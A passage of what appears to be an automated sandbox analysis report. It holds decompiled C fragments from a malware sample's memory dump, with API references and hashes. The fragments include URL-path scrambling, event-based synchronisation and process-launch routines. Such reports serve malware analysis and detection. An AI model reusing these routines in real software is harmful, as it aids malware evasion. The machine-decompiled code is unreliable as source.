              								 *((intOrPtr*)( *_t65 + 8))(_t65);
              							}
              							 *_t87(_v28);
              						}
              						_t58 = _v32;
              						 *((intOrPtr*)( *_t58 + 8))(_t58);
              					}
              				}
              				return _t118;
              			}





































              0x02ce6ce4
              0x02ce6ced
              0x02ce6cee
              0x02ce6cf2
              0x02ce6cf8
              0x02ce6cfe
              0x02ce6d07
              0x02ce6d0d
              0x02ce6d17
              0x02ce6d19
              0x02ce6d1f
              0x02ce6d24
              0x02ce6d2f
              0x02ce6d35
              0x02ce6d3a
              0x02ce6e5c
              0x02ce6d40
              0x02ce6d40
              0x02ce6d4d
              0x02ce6d53
              0x02ce6d59
              0x02ce6d5d
              0x02ce6d63
              0x02ce6d70
              0x02ce6d74
              0x02ce6d7a
              0x02ce6d7d
              0x02ce6d85
              0x02ce6d86
              0x02ce6d8a
              0x02ce6d8e
              0x02ce6d91
              0x02ce6d94
              0x02ce6d9a
              0x02ce6da3
              0x02ce6da9
              0x02ce6daa
              0x02ce6dad
              0x02ce6dae
              0x02ce6daf
              0x02ce6db7
              0x02ce6db8
              0x02ce6db9
              0x02ce6dbb
              0x02ce6dbf
              0x02ce6dc3
              0x00000000
              0x00000000
              0x02ce6dc9
              0x02ce6dd2
              0x02ce6dd8
              0x02ce6de2
              0x02ce6de6
              0x02ce6de8
              0x02ce6df5
              0x02ce6df9
              0x02ce6e01
              0x02ce6e06
              0x02ce6e18
              0x02ce6e1a
              0x02ce6e20
              0x02ce6e20
              0x02ce6e29
              0x02ce6e29
              0x02ce6e2b
              0x02ce6e31
              0x02ce6e31
              0x02ce6e34
              0x02ce6e3a
              0x02ce6e3d
              0x02ce6e46
              0x00000000
              0x00000000
              0x00000000
              0x02ce6e46
              0x02ce6d9a
              0x02ce6d94
              0x02ce6d7d
              0x02ce6e4c
              0x02ce6e4c
              0x02ce6e52
              0x02ce6e52
              0x02ce6e58
              0x02ce6e58
              0x02ce6e61
              0x02ce6e67
              0x02ce6e67
              0x02ce6d24
              0x02ce6e70

              APIs
              • SysAllocString.OLEAUT32(02CE9284), ref: 02CE6D2F
              • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02CE6E10
              • SysFreeString.OLEAUT32(00000000), ref: 02CE6E29
              • SysFreeString.OLEAUT32(?), ref: 02CE6E58
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: String$Free$Alloclstrcmp
              • String ID:
              • API String ID: 1885612795-0
              • Opcode ID: 674b4d633b5ad33ce1aaf1e6d8b342818d0deca16bfe76dbccab62efd9bce9c7
              • Instruction ID: 1cdca08f7cb19782bb63ba6d38e136063d3aa73617c331845933b97627fc6b29
              • Opcode Fuzzy Hash: 674b4d633b5ad33ce1aaf1e6d8b342818d0deca16bfe76dbccab62efd9bce9c7
              • Instruction Fuzzy Hash: 21514175D00519EFCF11EFA8C4889AEB7BAFF88704B244594E916EB350D731AE41CB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SysAllocString.OLEAUT32(?), ref: 02CE59B8
              • SysFreeString.OLEAUT32(00000000), ref: 02CE5A9D
                • Part of subcall function 02CE6CDF: SysAllocString.OLEAUT32(02CE9284), ref: 02CE6D2F
              • SafeArrayDestroy.OLEAUT32(00000000), ref: 02CE5AF0
              • SysFreeString.OLEAUT32(00000000), ref: 02CE5AFF
                • Part of subcall function 02CE77E3: Sleep.KERNEL32(000001F4), ref: 02CE782B
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: String$AllocFree$ArrayDestroySafeSleep
              • String ID:
              • API String ID: 3193056040-0
              • Opcode ID: d9ccf31ec11b1874e4fe9f3870ac87816b7159b17a535141056e03f69f4c9536
              • Instruction ID: d232a79e10eccb288bd7c59746b9f6d5b9a9d2f15f9f85cbe9835ea5b165fbed
              • Opcode Fuzzy Hash: d9ccf31ec11b1874e4fe9f3870ac87816b7159b17a535141056e03f69f4c9536
              • Instruction Fuzzy Hash: 9A515475900609EFDF01DFA8C884AAEB7B6FF88748F548929E506DB210DB71DD45CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E02CE4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				signed int _v16;
              				void _v156;
              				void _v428;
              				void* _t55;
              				unsigned int _t56;
              				signed int _t66;
              				signed int _t74;
              				void* _t76;
              				signed int _t79;
              				void* _t81;
              				void* _t92;
              				void* _t96;
              				signed int* _t99;
              				signed int _t101;
              				signed int _t103;
              				void* _t107;
              
              				_t92 = _a12;
              				_t101 = __eax;
              				_t55 = E02CE61EF(_a16, _t92);
              				_t79 = _t55;
              				if(_t79 == 0) {
              					L18:
              					return _t55;
              				}
              				_t56 =  *(_t92 + _t79 * 4 - 4);
              				_t81 = 0;
              				_t96 = 0x20;
              				if(_t56 == 0) {
              					L4:
              					_t97 = _t96 - _t81;
              					_v12 = _t96 - _t81;
              					E02CE6725(_t79,  &_v428);
              					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02CE7477(_t101,  &_v428, _a8, _t96 - _t81);
              					E02CE7477(_t79,  &_v156, _a12, _t97);
              					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
              					_t66 = E02CE6725(_t101, 0x2cea1d0);
              					_t103 = _t101 - _t79;
              					_a8 = _t103;
              					if(_t103 < 0) {
              						L17:
              						E02CE6725(_a16, _a4);
              						E02CE7894(_t79,  &_v428, _a4, _t97);
              						memset( &_v428, 0, 0x10c);
              						_t55 = memset( &_v156, 0, 0x84);
              						goto L18;
              					}
              					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
              					do {
              						if(_v8 != 0xffffffff) {
              							_push(1);
              							_push(0);
              							_push(0);
              							_push( *_t99);
              							L02CE82DA();
              							_t74 = _t66 +  *(_t99 - 4);
              							asm("adc edx, esi");
              							_push(0);
              							_push(_v8 + 1);
              							_push(_t92);
              							_push(_t74);
              							L02CE82D4();
              							if(_t92 > 0 || _t74 > 0xffffffff) {
              								_t74 = _t74 | 0xffffffff;
              								_v16 = _v16 & 0x00000000;
              							}
              						} else {
              							_t74 =  *_t99;
              						}
              						_t106 = _t107 + _a8 * 4 - 0x1a8;
              						_a12 = _t74;
              						_t76 = E02CE5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
              						while(1) {
              							 *_t99 =  *_t99 - _t76;
              							if( *_t99 != 0) {
              								goto L14;
              							}
              							L13:
              							_t92 =  &_v156;
              							if(E02CE6E71(_t79, _t92, _t106) < 0) {
              								break;
              							}
              							L14:
              							_a12 = _a12 + 1;
              							_t76 = E02CE10A0(_t79,  &_v156, _t106, _t106);
              							 *_t99 =  *_t99 - _t76;
              							if( *_t99 != 0) {
              								goto L14;
              							}
              							goto L13;
              						}
              						_a8 = _a8 - 1;
              						_t66 = _a12;
              						_t99 = _t99 - 4;
              						 *(0x2cea1d0 + _a8 * 4) = _t66;
              					} while (_a8 >= 0);
              					_t97 = _v12;
              					goto L17;
              				}
              				while(_t81 < _t96) {
              					_t81 = _t81 + 1;
              					_t56 = _t56 >> 1;
              					if(_t56 != 0) {
              						continue;
              					}
              					goto L4;
              				}
              				goto L4;
              			}





















              0x02ce4784
              0x02ce4790
              0x02ce4796
              0x02ce479b
              0x02ce479f
              0x02ce4911
              0x02ce4915
              0x02ce4915
              0x02ce47a5
              0x02ce47a9
              0x02ce47ad
              0x02ce47b0
              0x02ce47bb
              0x02ce47c1
              0x02ce47c6
              0x02ce47c9
              0x02ce47e3
              0x02ce47f2
              0x02ce47fe
              0x02ce4808
              0x02ce480d
              0x02ce480f
              0x02ce4812
              0x02ce48c9
              0x02ce48cf
              0x02ce48e0
              0x02ce48f3
              0x02ce4909
              0x00000000
              0x02ce490e
              0x02ce481b
              0x02ce4822
              0x02ce4826
              0x02ce482c
              0x02ce482e
              0x02ce4830
              0x02ce4832
              0x02ce4834
              0x02ce483e
              0x02ce4843
              0x02ce4845
              0x02ce4847
              0x02ce4848
              0x02ce4849
              0x02ce484a
              0x02ce4851
              0x02ce4858
              0x02ce485b
              0x02ce485b
              0x02ce4828
              0x02ce4828
              0x02ce4828
              0x02ce4863
              0x02ce486b
              0x02ce4877
              0x02ce487c
              0x02ce487c
              0x02ce4881
              0x00000000
              0x00000000
              0x02ce4883
              0x02ce4886
              0x02ce4893
              0x00000000
              0x00000000
              0x02ce4895
              0x02ce4895
              0x02ce48a2
              0x02ce487c
              0x02ce4881
              0x00000000
              0x00000000
              0x00000000
              0x02ce4881
              0x02ce48ac
              0x02ce48af
              0x02ce48b2
              0x02ce48b9
              0x02ce48b9
              0x02ce48c6
              0x00000000
              0x02ce48c6
              0x02ce47b2
              0x02ce47b6
              0x02ce47b7
              0x02ce47b9
              0x00000000
              0x00000000
              0x00000000
              0x02ce47b9
              0x00000000

              APIs
              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02CE4834
              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02CE484A
              • memset.NTDLL ref: 02CE48F3
              • memset.NTDLL ref: 02CE4909
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: memset$_allmul_aulldiv
              • String ID:
              • API String ID: 3041852380-0
              • Opcode ID: 25de842dc17152edffe085ea0f39d286c46d8960c89f7bcffa0694c464a8ee60
              • Instruction ID: afb3789010c357a0ea3d5eab374bbd6df90c00c46d193d624c53cb37bf421f31
              • Opcode Fuzzy Hash: 25de842dc17152edffe085ea0f39d286c46d8960c89f7bcffa0694c464a8ee60
              • Instruction Fuzzy Hash: FD41CE71A00259AFDF249F68CC44BEE77BAEF45310F104569E91BA7280EB70AE44DF81
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E02CE49D0(signed int _a4, signed int* _a8) {
              				void* __ecx;
              				void* __edi;
              				signed int _t6;
              				intOrPtr _t8;
              				intOrPtr _t12;
              				short* _t19;
              				void* _t25;
              				signed int* _t28;
              				CHAR* _t30;
              				long _t31;
              				intOrPtr* _t32;
              
              				_t6 =  *0x2cea310; // 0xd448b889
              				_t32 = _a4;
              				_a4 = _t6 ^ 0x109a6410;
              				_t8 =  *0x2cea348; // 0x256d5a8
              				_t3 = _t8 + 0x2ceb7b4; // 0x61636f4c
              				_t25 = 0;
              				_t30 = E02CE74EC(_t3, 1);
              				if(_t30 != 0) {
              					_t25 = CreateEventA(0x2cea34c, 1, 0, _t30);
              					E02CE61DA(_t30);
              				}
              				_t12 =  *0x2cea2fc; // 0x2000000a
              				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02CE30D5() != 0) {
              					L12:
              					_t28 = _a8;
              					if(_t28 != 0) {
              						 *_t28 =  *_t28 | 0x00000001;
              					}
              					_t31 = E02CE37DF(_t32, 0);
              					if(_t31 == 0 && _t25 != 0) {
              						_t31 = WaitForSingleObject(_t25, 0x4e20);
              					}
              					if(_t28 != 0 && _t31 != 0) {
              						 *_t28 =  *_t28 & 0xfffffffe;
              					}
              					goto L20;
              				} else {
              					_t19 =  *0x2cea124( *_t32, 0x20);
              					if(_t19 != 0) {
              						 *_t19 = 0;
              						_t19 = _t19 + 2;
              					}
              					_t31 = E02CE23C4(0,  *_t32, _t19, 0);
              					if(_t31 == 0) {
              						if(_t25 == 0) {
              							L22:
              							return _t31;
              						}
              						_t31 = WaitForSingleObject(_t25, 0x4e20);
              						if(_t31 == 0) {
              							L20:
              							if(_t25 != 0) {
              								CloseHandle(_t25);
              							}
              							goto L22;
              						}
              					}
              					goto L12;
              				}
              			}














              0x02ce49d1
              0x02ce49d8
              0x02ce49e2
              0x02ce49e6
              0x02ce49ec
              0x02ce49fb
              0x02ce4a02
              0x02ce4a06
              0x02ce4a18
              0x02ce4a1a
              0x02ce4a1a
              0x02ce4a1f
              0x02ce4a26
              0x02ce4a7d
              0x02ce4a7d
              0x02ce4a83
              0x02ce4a85
              0x02ce4a85
              0x02ce4a8f
              0x02ce4a93
              0x02ce4aa5
              0x02ce4aa5
              0x02ce4aa9
              0x02ce4aaf
              0x02ce4aaf
              0x00000000
              0x02ce4a3f
              0x02ce4a44
              0x02ce4a4c
              0x02ce4a50
              0x02ce4a54
              0x02ce4a54
              0x02ce4a61
              0x02ce4a65
              0x02ce4a69
              0x02ce4abe
              0x02ce4ac4
              0x02ce4ac4
              0x02ce4a77
              0x02ce4a7b
              0x02ce4ab2
              0x02ce4ab4
              0x02ce4ab7
              0x02ce4ab7
              0x00000000
              0x02ce4ab4
              0x02ce4a7b
              0x00000000
              0x02ce4a65

              APIs
                • Part of subcall function 02CE74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,05259DF8,00000000,?,?,43175AC3,00000005,02CEA00C,4D283A53,?,?), ref: 02CE7522
                • Part of subcall function 02CE74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02CE7546
                • Part of subcall function 02CE74EC: lstrcat.KERNEL32(00000000,00000000), ref: 02CE754E
              • CreateEventA.KERNEL32(02CEA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02CE6A95,?,?,?), ref: 02CE4A11
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              • WaitForSingleObject.KERNEL32(00000000,00004E20,02CE6A95,00000000,00000000,?,00000000,?,02CE6A95,?,?,?), ref: 02CE4A71
              • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02CE6A95,?,?,?), ref: 02CE4A9F
              • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02CE6A95,?,?,?), ref: 02CE4AB7
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
              • String ID:
              • API String ID: 73268831-0
              • Opcode ID: ff33d6c8a5cb0fa397480acaf1533403722b5a8ad4368ae1cdcb658f17910b56
              • Instruction ID: 66f1768d061824ddd23b08dd30821c4e4e649c85140d2cc29b0ed70325128220
              • Opcode Fuzzy Hash: ff33d6c8a5cb0fa397480acaf1533403722b5a8ad4368ae1cdcb658f17910b56
              • Instruction Fuzzy Hash: 3221F832AC03519BCF359A648C48B6B73EAEFC8738B050625FD47DB140DB30D9009B98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E02CE69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
              				intOrPtr _v12;
              				void* _v16;
              				void* _v28;
              				char _v32;
              				void* __esi;
              				void* _t29;
              				void* _t38;
              				signed int* _t39;
              				void* _t40;
              
              				_t36 = __ecx;
              				_v32 = 0;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_v12 = _a4;
              				_t38 = E02CE2A3D(__ecx,  &_v32);
              				if(_t38 != 0) {
              					L12:
              					_t39 = _a8;
              					L13:
              					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
              						_t23 =  &(_t39[1]);
              						if(_t39[1] != 0) {
              							E02CE28B3(_t23);
              						}
              					}
              					return _t38;
              				}
              				if(E02CE6ADC(0x40,  &_v16) != 0) {
              					_v16 = 0;
              				}
              				_t40 = CreateEventA(0x2cea34c, 1, 0,  *0x2cea3e4);
              				if(_t40 != 0) {
              					SetEvent(_t40);
              					Sleep(0xbb8);
              					CloseHandle(_t40);
              				}
              				_push( &_v32);
              				if(_a12 == 0) {
              					_t29 = E02CE5704(_t36);
              				} else {
              					_push(0);
              					_push(0);
              					_push(0);
              					_push(0);
              					_push(0);
              					_t29 = E02CE4C94(_t36);
              				}
              				_t41 = _v16;
              				_t38 = _t29;
              				if(_v16 != 0) {
              					E02CE7220(_t41);
              				}
              				if(_t38 != 0) {
              					goto L12;
              				} else {
              					_t39 = _a8;
              					_t38 = E02CE49D0( &_v32, _t39);
              					goto L13;
              				}
              			}












              0x02ce69e6
              0x02ce69f3
              0x02ce69f9
              0x02ce69fa
              0x02ce69fb
              0x02ce69fc
              0x02ce69fd
              0x02ce6a01
              0x02ce6a0d
              0x02ce6a11
              0x02ce6a99
              0x02ce6a99
              0x02ce6a9c
              0x02ce6a9e
              0x02ce6aa6
              0x02ce6aac
              0x02ce6aaf
              0x02ce6aaf
              0x02ce6aac
              0x02ce6aba
              0x02ce6aba
              0x02ce6a24
              0x02ce6a26
              0x02ce6a26
              0x02ce6a3d
              0x02ce6a41
              0x02ce6a44
              0x02ce6a4f
              0x02ce6a56
              0x02ce6a56
              0x02ce6a5f
              0x02ce6a63
              0x02ce6a71
              0x02ce6a65
              0x02ce6a65
              0x02ce6a66
              0x02ce6a67
              0x02ce6a68
              0x02ce6a69
              0x02ce6a6a
              0x02ce6a6a
              0x02ce6a76
              0x02ce6a79
              0x02ce6a7d
              0x02ce6a7f
              0x02ce6a7f
              0x02ce6a86
              0x00000000
              0x02ce6a88
              0x02ce6a88
              0x02ce6a95
              0x00000000
              0x02ce6a95

              APIs
              • CreateEventA.KERNEL32(02CEA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 02CE6A37
              • SetEvent.KERNEL32(00000000), ref: 02CE6A44
              • Sleep.KERNEL32(00000BB8), ref: 02CE6A4F
              • CloseHandle.KERNEL32(00000000), ref: 02CE6A56
                • Part of subcall function 02CE5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02CE6A76,?,02CE6A76,?,?,?,?,?,02CE6A76,?), ref: 02CE57DE
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Event$CloseCreateHandleObjectSingleSleepWait
              • String ID:
              • API String ID: 2559942907-0
              • Opcode ID: 077351d680d4da273e099e8fca1c8432597cf49f144cd5b14ef1234bd0eaacc4
              • Instruction ID: 78b6b8a0432156f62f7c91b1da2fc3b995de9c1128b2d4024ed2a118b78554ef
              • Opcode Fuzzy Hash: 077351d680d4da273e099e8fca1c8432597cf49f144cd5b14ef1234bd0eaacc4
              • Instruction Fuzzy Hash: BA219573D50219EFCF20EFE598849DE77BDEB58314B158829EA13A7100D734AA85CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E02CE4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
              				intOrPtr _v8;
              				void* _v12;
              				void* _v16;
              				intOrPtr _t26;
              				intOrPtr* _t28;
              				intOrPtr _t31;
              				intOrPtr* _t32;
              				void* _t39;
              				int _t46;
              				intOrPtr* _t47;
              				int _t48;
              
              				_t47 = __eax;
              				_push( &_v12);
              				_push(__eax);
              				_t39 = 0;
              				_t46 = 0;
              				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
              				_v8 = _t26;
              				if(_t26 < 0) {
              					L13:
              					return _v8;
              				}
              				if(_v12 == 0) {
              					Sleep(0xc8);
              					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
              				}
              				if(_v8 >= _t39) {
              					_t28 = _v12;
              					if(_t28 != 0) {
              						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
              						_v8 = _t31;
              						if(_t31 >= 0) {
              							_t46 = lstrlenW(_v16);
              							if(_t46 != 0) {
              								_t46 = _t46 + 1;
              								_t48 = _t46 + _t46;
              								_t39 = E02CE33DC(_t48);
              								if(_t39 == 0) {
              									_v8 = 0x8007000e;
              								} else {
              									memcpy(_t39, _v16, _t48);
              								}
              								__imp__#6(_v16);
              							}
              						}
              						_t32 = _v12;
              						 *((intOrPtr*)( *_t32 + 8))(_t32);
              					}
              					 *_a4 = _t39;
              					 *_a8 = _t46 + _t46;
              				}
              				goto L13;
              			}














              0x02ce446d
              0x02ce4471
              0x02ce4472
              0x02ce4473
              0x02ce4475
              0x02ce4477
              0x02ce447a
              0x02ce447f
              0x02ce4516
              0x02ce451d
              0x02ce451d
              0x02ce4488
              0x02ce448f
              0x02ce449f
              0x02ce449f
              0x02ce44a5
              0x02ce44a7
              0x02ce44ac
              0x02ce44b5
              0x02ce44bb
              0x02ce44c0
              0x02ce44cb
              0x02ce44cf
              0x02ce44d1
              0x02ce44d2
              0x02ce44db
              0x02ce44df
              0x02ce44f0
              0x02ce44e1
              0x02ce44e6
              0x02ce44eb
              0x02ce44fa
              0x02ce44fa
              0x02ce44cf
              0x02ce4500
              0x02ce4506
              0x02ce4506
              0x02ce450f
              0x02ce4514
              0x02ce4514
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: FreeSleepStringlstrlenmemcpy
              • String ID:
              • API String ID: 1198164300-0
              • Opcode ID: e93e5122a838e320d1c6af61343643ad7c9f3231421ffc6d2849bdd1b5375170
              • Instruction ID: 97d7202c7f065a1134adafaade56c57e5dbfd55356972776f38dfe771baf1f83
              • Opcode Fuzzy Hash: e93e5122a838e320d1c6af61343643ad7c9f3231421ffc6d2849bdd1b5375170
              • Instruction Fuzzy Hash: 60213075A01209EFCF15DFA4D98499EBBB5FF88315B108169E906A7300EB30DA01DB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E02CE2708(unsigned int __eax, void* __ecx) {
              				void* _v8;
              				void* _v12;
              				signed int _t21;
              				signed short _t23;
              				char* _t27;
              				void* _t29;
              				void* _t30;
              				unsigned int _t33;
              				void* _t37;
              				unsigned int _t38;
              				void* _t41;
              				void* _t42;
              				int _t45;
              				void* _t46;
              
              				_t42 = __eax;
              				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
              				_t38 = __eax;
              				_t30 = RtlAllocateHeap( *0x2cea2d8, 0, (__eax >> 3) + __eax + 1);
              				_v12 = _t30;
              				if(_t30 != 0) {
              					_v8 = _t42;
              					do {
              						_t33 = 0x18;
              						if(_t38 <= _t33) {
              							_t33 = _t38;
              						}
              						_t21 =  *0x2cea2f0; // 0x56bbc02e
              						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
              						 *0x2cea2f0 = _t23;
              						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
              						memcpy(_t30, _v8, _t45);
              						_v8 = _v8 + _t45;
              						_t27 = _t30 + _t45;
              						_t38 = _t38 - _t45;
              						_t46 = _t46 + 0xc;
              						 *_t27 = 0x2f;
              						_t13 = _t27 + 1; // 0x1
              						_t30 = _t13;
              					} while (_t38 > 8);
              					memcpy(_t30, _v8, _t38 + 1);
              				}
              				return _v12;
              			}

















              0x02ce2710
              0x02ce2713
              0x02ce2719
              0x02ce2731
              0x02ce2733
              0x02ce2738
              0x02ce273a
              0x02ce273d
              0x02ce273f
              0x02ce2742
              0x02ce2744
              0x02ce2744
              0x02ce2746
              0x02ce2751
              0x02ce2756
              0x02ce2767
              0x02ce276f
              0x02ce2774
              0x02ce2777
              0x02ce277a
              0x02ce277c
              0x02ce277f
              0x02ce2782
              0x02ce2782
              0x02ce2785
              0x02ce2790
              0x02ce2795
              0x02ce279f

              APIs
              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02CE6708,00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE2713
              • RtlAllocateHeap.NTDLL(00000000,?), ref: 02CE272B
              • memcpy.NTDLL(00000000,05259600,-00000008,?,?,?,02CE6708,00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE276F
              • memcpy.NTDLL(00000001,05259600,00000001,02CE3ECE,00000000,05259600), ref: 02CE2790
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: memcpy$AllocateHeaplstrlen
              • String ID:
              • API String ID: 1819133394-0
              • Opcode ID: 2c8b7280e34105c987f33400e5d0325c7b38ed83651134deff8372651d6b5f9e
              • Instruction ID: 867f84d93fb3342221ee8cbf2a7def72e41a1966d3d1dd951f2ebc42db515d2b
              • Opcode Fuzzy Hash: 2c8b7280e34105c987f33400e5d0325c7b38ed83651134deff8372651d6b5f9e
              • Instruction Fuzzy Hash: 5A110672A00214AFDB108A69DC85E9E7BBEEBC4360B150276F805EB240E7719E1097A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 64%
              			E02CE23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
              				intOrPtr _v36;
              				intOrPtr _v44;
              				intOrPtr _v48;
              				intOrPtr _v52;
              				void _v60;
              				char _v64;
              				intOrPtr _t18;
              				intOrPtr _t19;
              				intOrPtr _t26;
              				intOrPtr _t27;
              				long _t28;
              
              				_t27 = __edi;
              				_t26 = _a8;
              				_t28 = E02CE3A63(_a4, _t26, __edi);
              				if(_t28 != 0) {
              					memset( &_v60, 0, 0x38);
              					_t18 =  *0x2cea348; // 0x256d5a8
              					_t28 = 0;
              					_v64 = 0x3c;
              					if(_a12 == 0) {
              						_t7 = _t18 + 0x2ceb50c; // 0x70006f
              						_t19 = _t7;
              					} else {
              						_t6 = _t18 + 0x2ceb8d8; // 0x750072
              						_t19 = _t6;
              					}
              					_v52 = _t19;
              					_push(_t28);
              					_v48 = _a4;
              					_v44 = _t26;
              					_v36 = _t27;
              					E02CE5B56();
              					_push( &_v64);
              					if( *0x2cea100() == 0) {
              						_t28 = GetLastError();
              					}
              					_push(1);
              					E02CE5B56();
              				}
